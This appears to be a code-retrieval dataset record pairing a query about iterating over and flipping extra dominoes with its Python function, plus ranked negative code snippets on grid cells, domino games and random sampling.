[ "0.6033239", "0.5642616", "0.5578127", "0.5315496", "0.52856386", "0.5230224", "0.5207506", "0.51857436", "0.51733494", "0.5166131", "0.51407605", "0.5093636", "0.5047172", "0.50447404", "0.50364846", "0.50296426", "0.5018322", "0.499095", "0.49901915", "0.49538672", "0.49527854", "0.49503666", "0.49114814", "0.49036044", "0.49035886", "0.49032792", "0.4896659", "0.48891604", "0.48668414", "0.48373324" ]
0.5760053
1
Split all dominoes into separate cells. Useful for Dominosa.
def split_all(self):
    for domino in self.dominoes[:]:
        self.split(domino)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_split_cell_splits_neighbours(mock_amg):\n\n # split the centre cell in the mock grid\n # this will create 4 more cells at tier 1\n mock_amg.cells[4].split()\n\n # now split the bottom right of these cells\n # this should force the east and south cells to also be split\n mock_amg.cells[4].children['br'].split()\n\n assert mock_amg.cells[5].has_children\n assert mock_amg.cells[1].has_children", "def test_split_adds_children(mock_amg):\n\n mock_amg.cells[0].split()\n assert mock_amg.cells[0].children['bl'] is mock_amg.cells[-4]\n assert mock_amg.cells[0].children['br'] is mock_amg.cells[-3]\n assert mock_amg.cells[0].children['tl'] is mock_amg.cells[-2]\n assert mock_amg.cells[0].children['tr'] is mock_amg.cells[-1]", "def pushDominoes(self, dominoes: str) -> str:\n\n N = len(dominoes)\n dist_R = [-1] * N\n dist_L = [-1] * N\n\n count = -1\n for i in range(N):\n if dominoes[i] == 'R':\n count = 0\n elif dominoes[i] == 'L':\n count = -1\n elif count >= 0:\n count += 1\n dist_R[i] = count if count >= 0 else 2 * N\n\n count = -1\n for i in reversed(range(N)):\n if dominoes[i] == 'L':\n count = 0\n elif dominoes[i] == 'R':\n count = -1\n elif count >= 0:\n count += 1\n dist_L[i] = count if count >= 0 else 2 * N\n\n # print(dist_R)\n # print(dist_L)\n\n out = [\".\"] * N\n for i in range(N):\n if dist_R[i] < dist_L[i]:\n out[i] = \"R\"\n elif dist_R[i] > dist_L[i]:\n out[i] = \"L\"\n return \"\".join(out)", "def all_cells(self):\n \"\"\"\n Note that we use the convention that the first cell is (1,1)\n \"\"\"\n spart_star = self.circle_star()\n part = Partition(list(spart_star))\n coordinates = part.cells()\n coordinates = [(x+1, y+1) for x, y in coordinates]\n return coordinates", "def cells(self):\n \"\"\"\n Note that we use the convention that the first cell is (1,1)\n \"\"\"\n part = Partition(list(self))\n coordinates = part.cells()\n coordinates = [(x+1, y+1) for x, y in coordinates]\n return coordinates", "def cells(self):\n \"\"\"\n Note that we use the convention that the first cell is (1,1)\n \"\"\"\n spart_star = self.star()\n part = Partition(list(spart_star))\n coordinates = part.cells()\n coordinates = [(x+1, y+1) for x, y in coordinates]\n return coordinates", "def get_cells(self):\n return [\n cell for column in self.children for cell in column.get_cells()]", "def get_numbered_cells_adjacent_closed_cells(self):\r\n numbered_cells_adjacent_closed_cells = []\r\n numbered_cells = self.get_all_numbered_cells()\r\n for row, col in numbered_cells:\r\n _, closed_cells, _, _ = self.get_cells(row, col)\r\n if closed_cells:\r\n numbered_cells_adjacent_closed_cells.append((row, col))\r\n return numbered_cells_adjacent_closed_cells", "def delete_cells(self):\n cells_dict_base, cell_list_act, common_cells = self.cells_list()\n while(len(common_cells) != 0):\n cell_index = cells_dict_base[common_cells[0]]['index']\n if cell_index != len(cells_dict_base)-1:\n cell_start = cells_dict_base[common_cells[0]]['start']\n next_cell_start = [values['start'] for cell_name, values in cells_dict_base.items() if values['index'] == (cell_index+1)][0]\n cell_content = self.base_doc[cell_start: next_cell_start]\n self.base_doc = self.base_doc.replace(cell_content, '')\n else:\n cell_start = cells_dict_base[common_cells[0]]['start']\n cell_content = self.base_doc[cell_start:]\n self.base_doc = self.base_doc.replace(cell_content, '')\n self.removed_last_bracket = True\n cells_dict_base, cell_list_act, common_cells = self.cells_list()", "def bosonic_cells(self):\n cells = self.cells()\n fermionic_cells 
= self.fermionic_cells()\n coords = [x for x in cells if x not in fermionic_cells]\n return coords", "def to_cdo_grid(self, outfile):", "def simple_solution(self, dominoes: str) -> str:\n dominoes = list(dominoes)\n nodes = [(-1, 'L')] + [(i, x) for i, x in enumerate(dominoes) if x != '.'] + [\n (len(dominoes), 'R')]\n for (i, x), (j, y) in zip(nodes, nodes[1:]):\n if x == y:\n for k in range(i + 1, j):\n dominoes[k] = x\n elif x == 'R' and y == 'L':\n k, l = i, j\n while k < l:\n dominoes[k] = x\n dominoes[l] = y\n k, l = k + 1, l - 1\n if ((j - i + 1) % 2) != 0:\n dominoes[(j + i) // 2] = '.'\n return ''.join(dominoes)", "def _init_pagoda_clses(self):\n a = []; b = [] #IGNORE:C0321\n c = []; d = [] #IGNORE:C0321\n row_selector = ((a, b), (c, d))\n for cell in self.compact:\n row_selector[cell.y % 2][cell.x % 2].append(cell)\n cell.pvalue = cell.y % 2 + 1 + cell.x % 2 \n return a, b, c, d", "def partition_domain(self, dom):\r\n split = len(dom) // 2\r\n dom1 = set(list(dom)[0:split])\r\n dom2 = dom - dom1\r\n return dom1, dom2", "def _cells(notebook):\n if notebook.nbformat < 4:\n for ws in notebook.worksheets:\n for cell in ws.cells:\n yield cell\n else:\n for cell in notebook.cells:\n yield cell", "def make_cells(self, fields: Dict[str, Any]) -> List[Cell]:\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result", "def test_split_cell_east_sets_neighbours(mock_amg):\n\n mock_amg.cells[4].split() # middle cell\n mock_amg.cells[5].split() # east cell\n\n east = mock_amg.cells[5]\n west = mock_amg.cells[4]\n\n assert west.children['tr'].east == east.children['tl']\n assert west.children['br'].east == east.children['bl']\n assert east.children['tl'].west == west.children['tr']\n assert east.children['bl'].west == west.children['br']", "def test_split_cell_creates_four_more_cells(mock_amg):\n\n init_n_windows = mock_amg.n_windows\n init_n_cells = mock_amg.n_cells\n\n mock_amg.cells[0].split()\n\n assert init_n_windows + 5 == mock_amg.n_windows\n assert init_n_cells + 4 == mock_amg.n_cells", "def pushDominoes(self, dominoes: str) -> str:\n return self.simple_solution(dominoes)", "def split(self, dim, bins):\n if type(bins) in (int, complex):\n bins = np.r_[self.min(dim):self.max(dim):bins]\n p = self.get_cols(dim)[0]\n idx = np.digitize(p, bins)\n splitted = []\n for i in xrange(1,len(bins)):\n new_data = self.data[idx==i]\n splitted.append(DataTable(\n new_data,\n self.dims,\n self.legends,\n self.tags,\n self.sub_name('%.2f<=%s<%.2f' % (bins[i-1], dim, bins[i]))))\n return splitted", "def _generate_cells(self) -> None:\n for i in range(15):\n for j in range(15):\n c = Cell(x=i, y=j)\n c.answer = self.puzzle.solution[j*self.width+i]\n self.cells[(j, i)] = c # row, col", "def test_split_cell_south_sets_neighbours(mock_amg):\n\n mock_amg.cells[4].split() # middle cell\n mock_amg.cells[1].split() # south cell\n\n south = mock_amg.cells[1]\n north = mock_amg.cells[4]\n\n assert south.children['tl'].north == north.children['bl']\n assert south.children['tr'].north == north.children['br']\n assert north.children['bl'].south == south.children['tl']\n assert north.children['br'].south == south.children['tr']", "def merge_cells(self):\n\n for rownum, row in enumerate(self.cells):\n for colnum, cell in enumerate(row):\n if not isinstance(cell, Cell):\n continue\n cols_to_merge = 0\n for i in range(colnum+1, len(row)):\n if isinstance(self.cells[rownum][i], Cell) and self.cells[rownum][i].event == 
cell.event:\n cols_to_merge += 1\n if cols_to_merge > 0:\n cell.colspan = cols_to_merge + 1\n for i in range(1, cols_to_merge + 1):\n self.cells[rownum][colnum + i] = SpanCell(rownum, colnum + i)", "def cells_list(self):\n xx, yy = np.meshgrid(self.x_spacings, self.y_spacings)\n return np.vstack([yy.ravel(), xx.ravel()]).transpose()", "def test_split_adds_known_neighbours(mock_amg):\n\n mock_amg.cells[4].split()\n # bl\n assert mock_amg.cells[-4].north is mock_amg.cells[-2]\n assert mock_amg.cells[-4].east is mock_amg.cells[-3]\n\n # br\n assert mock_amg.cells[-3].north is mock_amg.cells[-1]\n assert mock_amg.cells[-3].west is mock_amg.cells[-4]\n\n # tl\n assert mock_amg.cells[-2].south is mock_amg.cells[-4]\n assert mock_amg.cells[-2].east is mock_amg.cells[-1]\n\n # tr\n assert mock_amg.cells[-1].south is mock_amg.cells[-3]\n assert mock_amg.cells[-1].west is mock_amg.cells[-2]", "def fill_cells(self, latitudes, longitudes, businesses):\n if len(businesses) == 0:\n # There are no businesses in this area\n return\n if longitudes.size > 2:\n # First we devide the collection along the center of longitudes\n center = longitudes[longitudes.size / 2]\n fill_cells(self, latitudes,\n longitudes[:(longitudes.size / 2 + 1)],\n businesses[businesses.longitude <= center])\n fill_cells(self, latitudes, longitudes[(longitudes.size / 2):],\n businesses[businesses.longitude > center])\n elif latitudes.size > 2:\n # Now we devide along the center of latitudes\n center = latitudes[latitudes.size / 2]\n fill_cells(self, latitudes[:(latitudes.size / 2 + 1)],\n longitudes,\n businesses[businesses.latitude <= center])\n fill_cells(self, latitudes[(latitudes.size / 2):], longitudes,\n businesses[businesses.latitude > center])\n else:\n # Now we are in one Cell! Let's store our businesses\n bizs = []\n for idx, business in businesses.iterrows():\n # For performance, we only store index and coordinates\n bizs.append({'index': idx,\n 'latitude': business.latitude,\n 'longitude': business.longitude})\n coord = (self.longitudes.searchsorted(longitudes[0]),\n self.latitudes.searchsorted(latitudes[0]))\n if coord[0] not in self.cells:\n self.cells[coord[0]] = {}\n self.cells[coord[0]].update({coord[1]: bizs})", "def visit_table(self, sytable):\n def index(sytable):\n try:\n return sytable.get_column(self.input_index)\n except:\n return np.arange(sytable.number_of_rows())\n\n def slices_using_group_array(group_array):\n \"\"\"Return the slices to split by.\n A group array is made of strictly increasing group identifiers.\n\n >>> slices_using_group_array(np.array([0, 0, 0, 1, 1, 2, 3, 3, 3]))\n [(0, 3), (3, 5), (5, 6), (6, 9)]\n \"\"\"\n unique_elements = np.unique(group_array)\n slices = []\n for unique_element in unique_elements:\n indexes = np.flatnonzero(group_array == unique_element)\n low, high = (indexes[0], indexes[-1] + 1)\n slices.append((unique_element, slice(low, high)))\n return slices\n\n def indices_using_group_array(group_array):\n \"\"\"\n Return list of index lists, ordered by first occurance of value.\n \"\"\"\n unique_elements = np.unique(group_array)\n indices = []\n for unique_element in unique_elements:\n indices.append((unique_element,\n np.flatnonzero(group_array == unique_element)))\n return indices\n\n columns = sytable.columns()\n # Perform the split and append the new tables to output.\n slice_indices = indices_using_group_array(index(sytable))\n column_attrs = {}\n\n for unique_element, slice_index in slice_indices:\n # Sets of all columns except for the INDEX columns.\n result = 
type(sytable)(sytable.container_type)\n self.output_list.append((unique_element, result))\n\n for column in columns:\n array = sytable.get_column(column)[slice_index]\n if self.remove_fill and len(array):\n kind = array.dtype.kind\n if kind in ['S', 'U']:\n if np.all(array == ''):\n continue\n else:\n if not len(array) or np.isnan(np.min(array)):\n continue\n\n result.set_column(column, array)\n if column in column_attrs:\n attrs = column_attrs[column]\n else:\n attrs = dict(\n sytable.get_column_attributes(column).get())\n column_attrs[column] = attrs\n result.get_column_attributes(column).set(attrs)", "def choose_extra_dominoes(self, random):\n dominoes = self.extra_dominoes[:]\n count = len(dominoes)\n start = random.randrange(count)\n for i in range(count):\n yield dominoes[(i + start) % count]", "def test_split_cell_west_sets_neighbours(mock_amg):\n\n mock_amg.cells[4].split() # middle cell\n mock_amg.cells[3].split() # west cell\n\n west = mock_amg.cells[3]\n east = mock_amg.cells[4]\n\n assert west.children['tr'].east == east.children['tl']\n assert west.children['br'].east == east.children['bl']\n assert east.children['tl'].west == west.children['tr']\n assert east.children['bl'].west == west.children['br']", "def split_into_codons(dna):\n dna_split = []\n length = math.ceil(len(dna)/3)\n for i in range(0, length):\n j = 3*i\n codon = dna[j:j+3]\n dna_split += [codon]\n return dna_split" ]
[ "0.54147345", "0.53187776", "0.5316432", "0.53141034", "0.50757587", "0.50472033", "0.5007801", "0.49147692", "0.49121788", "0.4892322", "0.48909703", "0.48512492", "0.48459086", "0.48424825", "0.48366407", "0.48032853", "0.47910866", "0.47892538", "0.47808278", "0.47771978", "0.47716329", "0.4771325", "0.47523955", "0.47449994", "0.47403342", "0.47374755", "0.47298428", "0.4729653", "0.4727065", "0.4720182" ]
0.7638271
0
Iterate through self.extra_dominoes, starting at a random position. Returns a generator of dominoes.
def choose_extra_dominoes(self, random):
    dominoes = self.extra_dominoes[:]
    count = len(dominoes)
    start = random.randrange(count)
    for i in range(count):
        yield dominoes[(i + start) % count]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def choose_and_flip_extra_dominoes(self, random):\n for domino in self.choose_extra_dominoes(random):\n if domino.head.pips == domino.tail.pips:\n yield domino, False\n else:\n flip_first = random.randint(0, 1)\n for j in range(2):\n yield domino, flip_first + j == 1", "def pickup_dominoes(self, num_dominoes, player):\n\n for domino in range(num_dominoes):\n shuffle(self.boneyard)\n player.hand.append(self.boneyard.pop(0))", "def derandomize(self, xs, noises):\n raise NotImplementedError", "def _all_donors(self, include_background=True):\n sheets = self.shortcut_sheets\n if not include_background:\n sheets = filter(is_not_background, sheets)\n for sheet in sheets:\n for entity in sheet.bio_entities.values():\n yield entity", "def __dice_generator(self):\n self.current_dice = np.random.randint(1, 6 + 1)", "def get_seeds(self, start: float, num: int) -> np.ndarray:\r\n\r\n if self.integral:\r\n if self.domain[1] - self.domain[0] + 1 <= num:\r\n return np.arange(self.domain[0], self.domain[1] + 1)\r\n result = np.random.choice(\r\n np.arange(self.domain[0], self.domain[1] + 1), num, replace=False)\r\n if start not in result:\r\n result[0] = start\r\n return result\r\n\r\n\r\n result = np.zeros((num,), dtype='float64')\r\n result[0] = start\r\n min_sep = (self.domain[1] - self.domain[0]) * min(0.05, 0.25 / num)\r\n\r\n for i in range(1, num):\r\n rejections = 0\r\n while True:\r\n _pt = np.random.uniform(self.domain[0], self.domain[1], 1)\r\n if sdist.cdist(_pt.reshape(1, 1), result[:i].reshape(i, 1)).min() < min_sep:\r\n rejections += 1\r\n if rejections > 50000:\r\n raise ValueError(\r\n f'failed to sample! domain might be singleton: {self.domain}')\r\n else:\r\n result[i] = _pt\r\n break\r\n\r\n return result", "def generate_random_walker():\n # must have seeds that generate known problems\n must_have_seeds = [112, 308, 393]\n for seed in must_have_seeds:\n print(\"Last used seed: {}\".format(seed))\n detections = detections_simple_tracking(seed)\n yield simple_walker(data_simple_tracking(detections)), detections\n while True:\n seed = random.randint(0, 2**10)\n print(\"Last used seed: {}\".format(seed))\n detections = detections_simple_tracking(seed)\n yield simple_walker(data_simple_tracking(detections)), detections", "def iter_dist(self):\n self.makeTree()\n coords = self.coords\n sd = selfdistance\n for i in self.loopindices:\n dists, inds = self.nntree.query(coords[i], self.nnmaxcount,\n distance_upper_bound=self.nncutoff)\n yield coords[i], dists.compress((dists > sd) & ~np.isinf(dists))", "def get_examples():\n symbols = get_symbols()\n symbol_start_indices, total_examples = _index_symbols(symbols)\n selection_order = np.arange(total_examples)\n np.random.shuffle(selection_order)\n for sample_index in selection_order:\n # use a binary search to determine which symbol to use given the sample_index\n start_index_index = bisect.bisect_left(symbol_start_indices, sample_index + 1) - 1\n start_index = symbol_start_indices[start_index_index]\n offset = sample_index - start_index\n symbol = symbols[start_index_index]\n time_series_data = get_time_series_data(symbol)\n next_day = time_series_data[offset]\n previous_days = time_series_data[offset + 1: offset + 1 + EXAMPLE_SIZE]\n previous_days.reverse()\n metadata = get_metadata_for_symbol(symbol)\n yield previous_days, next_day, metadata", "def split_all(self):\n for domino in self.dominoes[:]:\n self.split(domino)", "def nextGen(self):\n\n p = []\n while len(p) < len(self.p):\n #select mates and produce offspring\n p1, p2 = 
self.select()\n offspring = self.mate(p1, p2)\n\n #put the offspring in the next generation (with mutation)\n for child in offspring:\n child=self.mutate(child)\n p.append(child)\n \n\n # the world belongs to the new generation\n return p", "def getRandomCoordinates( self, size ):\n if not self.mIsLoaded: self.__loadIndex()\n\n token = random.choice( self.mIndex.keys() ) \n strand = random.choice( (\"+\", \"-\") )\n pos_id, pos_seq, lcontig = self.mIndex[token][:3]\n rpos = random.randint( 0, lcontig )\n if random.choice( (\"True\", \"False\") ):\n start = rpos\n end = min(rpos + size, lcontig)\n else:\n start = max(0, rpos - size)\n end = rpos\n \n return token, strand, start, end", "def insere_n_nos(self, num_nos):\n for i in range(num_nos):\n index = random.randint(1, 11 ** 4)\n elem = random.randint(1, 11 ** 4)\n self.insere(index, elem)", "def create_next_gen(self, parents_sreprs_couple):\n child0, child1 = self.recombine(parents_sreprs_couple[0], parents_sreprs_couple[1])\n if random.random() < self.mutate_prob:\n child0 = self.mutate(child0)\n if random.random() < self.mutate_prob:\n child1 = self.mutate(child1)\n\n return child0, child1", "def generate_random_tomogram_set(templates, criteria, number_of_tomograms, dim, seed=None, noise=False):\n if (seed == None):\n seed = random.randint(0, 2 ** 31 - 1)\n print('Using random seed: ', seed)\n random.seed(int(seed))\n np.random.seed(int(seed))\n\n for i in range(number_of_tomograms):\n yield generate_random_tomogram(templates, criteria, dim, noise)", "def play_dominoes(draw=draw_init, save_file=None, num_games=1000, save=True):\n list_victories = [0]*(NUM_PLAYERS+1)\n game = Dominoes(NUM_PLAYERS, HAND_SIZE, TOPNUM, save_file=save_file)\n \n # Setups the game. This includes initializing the player instances.\n player1 = RandomDominoPlayer(1, game)\n player2 = RandomDominoPlayer(2, game)\n player3 = RandomDominoPlayer(3, game)\n player4 = RandomDominoPlayer(4, game)\n list_players = (player1, player2, player3, player4)\n game.setup(list_players)\n\n # Play!\n for i in range(num_games):\n # Cleans the game state\n game.reset()\n \n # Draws the starting dominoes.\n starting_dominoes = draw(NUM_PLAYERS, DOMINO, HAND_SIZE)\n# print('\\nStarting_dominoes')\n# print(starting_dominoes[0])\n# print(starting_dominoes[1])\n# print(starting_dominoes[2])\n# print(starting_dominoes[3])\n \n # Assigns the starting dominoes to each player\n for player, dominoes in zip(list_players, starting_dominoes):\n player.reset(start_dominoes=list(dominoes))\n \n # Rolls the game!\n winner = roll_game(game, save=save)\n list_victories[winner] += 1\n if (i*20) % num_games == 0:\n print(i*100/num_games, '% processed.')\n \n# print('Salida:', game.salida)\n \n print('\\n', list_victories, '\\t', list_victories[1]+list_victories[3], \n list_victories[2]+list_victories[4])", "def random_iterator(self, batch_size):\n all_indices = np.nonzero(np.logical_not(self._dones))[0]\n np.random.shuffle(all_indices)\n\n states = np.asarray(self._states)\n actions = np.asarray(self._actions)\n next_states = np.asarray(self._next_states)\n rewards = np.asarray(self._rewards)\n dones = np.asarray(self._dones)\n\n i = 0\n while i < len(all_indices):\n indices = all_indices[i:i+batch_size]\n\n yield states[indices], actions[indices], next_states[indices], rewards[indices], dones[indices]\n\n i += batch_size", "def _build_genotypes(self):\n x = np.zeros(self.n)\n \n # Frequencies derived from HWE.\n num_hetero = 2 * self.maf * (1 - self.maf) * self.n\n num_homo_minor = self.maf ** 2 * 
self.n\n \n x[:num_hetero] = 1\n x[num_hetero:num_hetero+num_homo_minor] = 2\n np.random.shuffle(x)\n \n # Add noise for dosage values if needed.\n if self.dosage_var:\n x[x == 0] += np.abs(\n np.random.normal(0, self.dosage_var, len(x[x == 0]))\n )\n x[x == 1] += np.random.normal(0, self.dosage_var, len(x[x == 1]))\n x[x == 2] -= np.abs(\n np.random.normal(0, self.dosage_var, len(x[x == 2]))\n )\n\n # Mask some values if the call rate is not 1.\n if self.call_rate < 1:\n missing_rate = 1 - self.call_rate\n missing_number = missing_rate * self.n\n missing_idx = np.arange(0, self.n)\n np.random.shuffle(missing_idx)\n missing_idx = missing_idx[:missing_number]\n x[missing_idx] = np.nan\n \n return x", "def _iterate_domains(self):\n\n class DomainIter:\n # Indices refer to positions between the nucleotides, as usual for \n # slices in python.\n\n def __init__(self, domain, cursor, rel_start, rel_end):\n self.domain = domain\n self.start = cursor\n self.rel_start = rel_start\n self.rel_end = rel_end\n\n def __repr__(self):\n return ('DomainIter('\n 'domain={0.domain!r}, '\n 'start={0.start}, '\n 'rel_start={0.rel_start}, '\n 'rel_end={0.rel_end})'.format(self))\n @property\n def len(self):\n return self.rel_end - self.rel_start\n\n @property\n def end(self):\n return self.start + self.len\n\n def rel_index(self, index):\n return index - self.start + self.rel_start\n\n def abs_index(self, rel_index):\n return self.start + rel_index - self.rel_start\n\n domain_cursor = 0\n index_cursor = 0\n \n while domain_cursor < len(self._domains):\n domain = self._domains[domain_cursor]\n\n # If this domain doesn't have anything attached to it, then we can \n # just yield the whole thing right away.\n\n if domain not in self._attachments:\n yield DomainIter(domain, index_cursor, 0, len(domain))\n index_cursor += len(domain)\n\n # If this domain does have something attached to it, then we need \n # to carefully yield only the parts of it that aren't covered by \n # the attachment.\n\n else:\n attachment = self._attachments[domain]\n\n # Yield whatever fraction of this domain comes before the \n # attachment.\n\n yield DomainIter(domain,\n index_cursor, 0, attachment.start_index)\n index_cursor += attachment.start_index\n\n # Yield the domains in the attachment itself by recursively \n # calling this method.\n\n for domain_iter in attachment.construct._iterate_domains():\n domain_iter.start += index_cursor\n yield domain_iter\n index_cursor += len(attachment.construct)\n\n # Skip domains until we reach the one where the attachment \n # ends.\n\n while domain is not attachment.end_domain:\n domain_cursor += 1\n domain = self._domains[domain_cursor]\n\n # Yield whatever fraction of that domain comes after the \n # attachment.\n\n yield DomainIter(domain,\n index_cursor, attachment.end_index, len(domain))\n index_cursor += len(domain) - attachment.end_index\n\n domain_cursor += 1", "def mutate_random(self, n=1):\n mutated_dna = self._dna\n for i in range(n):\n mutated_dna = mutate(mutated_dna)\n return Gene(mutated_dna, self._exon_regions)", "def get_next_articles(self):\n\t\tarticles = Blog.objects.all()\\\n\t\t\t.filter(publication_date__lte=datetime.date.today())\\\n\t\t\t.order_by('publication_date')\n\n\t\tif articles.count() <= 4:\n\t\t\treturn articles\n\n\t\ti, j, k, l = random.sample(range(0, articles.count()-1), 4)\n\t\treturn [articles[i], articles[j], articles[k], articles[l]]", "def generate_dimino(self, af=False):\n idn = list(range(self.degree))\n order = 0\n element_list = [idn]\n 
set_element_list = {tuple(idn)}\n if af:\n yield idn\n else:\n yield _af_new(idn)\n gens = [p._array_form for p in self.generators]\n\n for i in range(len(gens)):\n # D elements of the subgroup G_i generated by gens[:i]\n D = element_list[:]\n N = [idn]\n while N:\n A = N\n N = []\n for a in A:\n for g in gens[:i + 1]:\n ag = _af_rmul(a, g)\n if tuple(ag) not in set_element_list:\n # produce G_i*g\n for d in D:\n order += 1\n ap = _af_rmul(d, ag)\n if af:\n yield ap\n else:\n p = _af_new(ap)\n yield p\n element_list.append(ap)\n set_element_list.add(tuple(ap))\n N.append(ap)\n self._order = len(element_list)", "def generate_examples_serial(self):\n # Now we have a Gensim Dictionary to work with\n self._build_dictionary()\n # Remove any tokens with a frequency less than 10\n self.dictionary.filter_extremes(no_below=10, no_above=0.75)\n\n self.examples = []\n for file in tqdm(self.load_files(), desc=\"Generating Examples (serial)\"):\n file = self.dictionary.doc2idx(file)\n self.examples.extend(self._generate_examples_from_file(file))", "def __iter__(self) -> Generator:\n\t\treturn (article for article in self._articles)", "def random_population():\n pop = []\n for i in range(POP_SIZE):\n dna = \"\"\n for c in range(DNA_SIZE):\n dna += random_char()\n pop.append(dna)\n return pop", "def _generate_pores(self):\n logger.info(\"Place randomly located pores in the domain\")\n #Original Random Point Generator\n #coords = sp.rand(self._Np,3)*[self._Lx,self._Ly,self._Lz]\n #Seeding Code\n coords = np.zeros([self._Np,3])\n #reject points close to boundaries - if False there will be slightly more\n rejection = [False,False,True]\n for j in range(3):\n i = 0\n while i < self._Np:\n coord = np.random.uniform(0,1,1)\n if self._reject(coord) == rejection[j]:\n coords[i][j]=coord\n i += 1\n coords*=np.array([self._Lx,self._Ly,self._Lz])\n #Seeding Code\n #Uniform Random Generator\n #coords = np.array([np.random.uniform(0,self._Lx,self._Np),np.random.uniform(0,self._Ly,self._Np),np.random.uniform(0,self._Lz,self._Np)]).T\n\n self['pore.coords'] = coords\n logger.debug(\"End of method\")", "def generate_moves(self, board: Board) -> typing.Iterator[MoveDescription]:\n dominoes = set(board.dominoes)\n for domino in dominoes:\n dx, dy = domino.direction\n yield from self.try_move(domino, dx, dy)\n yield from self.try_move(domino, -dx, -dy)", "def generate_units(self, num_soldados, num_magos):\n self.soldados = [soldier(randrange(*self.race.rango_atq_soldado),\n randrange(*self.race.rango_vid_soldado))\n for i in range(num_soldados)]\n\n self.magos = [mage(randrange(*self.race.rango_atq_mago),\n randrange(*self.race.rango_vid_mago))\n for i in range(num_magos)]\n\n self._initial_life_set = False", "def sequence(self):\n for tn in self._testnodes:\n yield tn", "def newGeneration(self):\n for i in range(0, len(self.population)):\n [ind1, ind2] = self.randomSelection()\n child = self.crossover(ind1, ind2)\n self.population[i].setGene(child)\n self.mutation(self.population[i])" ]
[ "0.6895019", "0.62940025", "0.5725973", "0.53913283", "0.51478684", "0.5122216", "0.5106027", "0.51026565", "0.5055542", "0.50077224", "0.49957895", "0.4972248", "0.49301994", "0.49140477", "0.49055457", "0.48926997", "0.4876082", "0.48698455", "0.48647448", "0.48630825", "0.48471773", "0.48347035", "0.47879037", "0.4787243", "0.47839093", "0.47767895", "0.47700804", "0.4763562", "0.47510606", "0.47437888" ]
0.8736248
0
Iterate through self.extra_dominoes, starting at a random position. Returns a generator of (domino, is_flipped) pairs; each domino is returned twice, with is_flipped True and False in random order.
def choose_and_flip_extra_dominoes(self, random):
    for domino in self.choose_extra_dominoes(random):
        if domino.head.pips == domino.tail.pips:
            yield domino, False
        else:
            flip_first = random.randint(0, 1)
            for j in range(2):
                yield domino, flip_first + j == 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def choose_extra_dominoes(self, random):\n dominoes = self.extra_dominoes[:]\n count = len(dominoes)\n start = random.randrange(count)\n for i in range(count):\n yield dominoes[(i + start) % count]", "def pickup_dominoes(self, num_dominoes, player):\n\n for domino in range(num_dominoes):\n shuffle(self.boneyard)\n player.hand.append(self.boneyard.pop(0))", "def derandomize(self, xs, noises):\n raise NotImplementedError", "def adjacent_octile(randomize=False):\n moves = [\n Point(0, 1),\n Point(1, 0),\n Point(0, -1),\n Point(-1, 0),\n Point(1, 1),\n Point(1, -1),\n Point(-1, 1),\n Point(-1, -1)\n ]\n\n if randomize:\n return random.shuffle(moves)\n else:\n return moves", "def generate_spin_flips(self, n_flips):\n first_flip_site = self._pick_site()\n first_flip_value = self.current_state[first_flip_site]\n\n if n_flips == 2:\n next_flip_site = self._pick_site()\n next_flip_value = self.current_state[next_flip_site]\n if self.zero_magnetization:\n if first_flip_value == next_flip_value:\n return []\n else:\n return [first_flip_site, next_flip_site]\n else:\n if first_flip_site == next_flip_site:\n return []\n else:\n return [first_flip_site, next_flip_site]\n else:\n return [first_flip_site]", "def in_random_order(theta):\r\n indexes = [i for i,_ in enumerate(data)] # creates a list of indices\r\n random.shuffle(indexes) # shuffles them\r\n for i in indexes:\r\n yield data[i] # return data in that order\r", "def play_dominoes(draw=draw_init, save_file=None, num_games=1000, save=True):\n list_victories = [0]*(NUM_PLAYERS+1)\n game = Dominoes(NUM_PLAYERS, HAND_SIZE, TOPNUM, save_file=save_file)\n \n # Setups the game. This includes initializing the player instances.\n player1 = RandomDominoPlayer(1, game)\n player2 = RandomDominoPlayer(2, game)\n player3 = RandomDominoPlayer(3, game)\n player4 = RandomDominoPlayer(4, game)\n list_players = (player1, player2, player3, player4)\n game.setup(list_players)\n\n # Play!\n for i in range(num_games):\n # Cleans the game state\n game.reset()\n \n # Draws the starting dominoes.\n starting_dominoes = draw(NUM_PLAYERS, DOMINO, HAND_SIZE)\n# print('\\nStarting_dominoes')\n# print(starting_dominoes[0])\n# print(starting_dominoes[1])\n# print(starting_dominoes[2])\n# print(starting_dominoes[3])\n \n # Assigns the starting dominoes to each player\n for player, dominoes in zip(list_players, starting_dominoes):\n player.reset(start_dominoes=list(dominoes))\n \n # Rolls the game!\n winner = roll_game(game, save=save)\n list_victories[winner] += 1\n if (i*20) % num_games == 0:\n print(i*100/num_games, '% processed.')\n \n# print('Salida:', game.salida)\n \n print('\\n', list_victories, '\\t', list_victories[1]+list_victories[3], \n list_victories[2]+list_victories[4])", "def loop_erased_random_walk(x, y):\n path = []\n directions = []\n\n while not visited[y][x]:\n direction = random.choice(maze.neighbors(x, y))\n nx, ny = maze.neighbor(x, y, direction)\n\n while (nx, ny) in path:\n path.pop()\n directions.pop()\n \n path.append((x, y))\n directions.append(direction)\n x, y = nx, ny\n \n return zip(path, directions)", "def in_random_order(data):\n indexes = [i for i, _ in enumerate(data)] # create a list of indexes\n random.shuffle(indexes) # shuffle them\n for i in indexes:\n yield data[i]", "def fill_space(self, x, y, random, matches_allowed):\n rotation = random.randint(0, 3) * 90\n for _ in range(4):\n try:\n choices = self.choose_and_flip_extra_dominoes(\n random)\n for domino, is_flipped in choices:\n if self.cycles_remaining <= 0:\n return False\n 
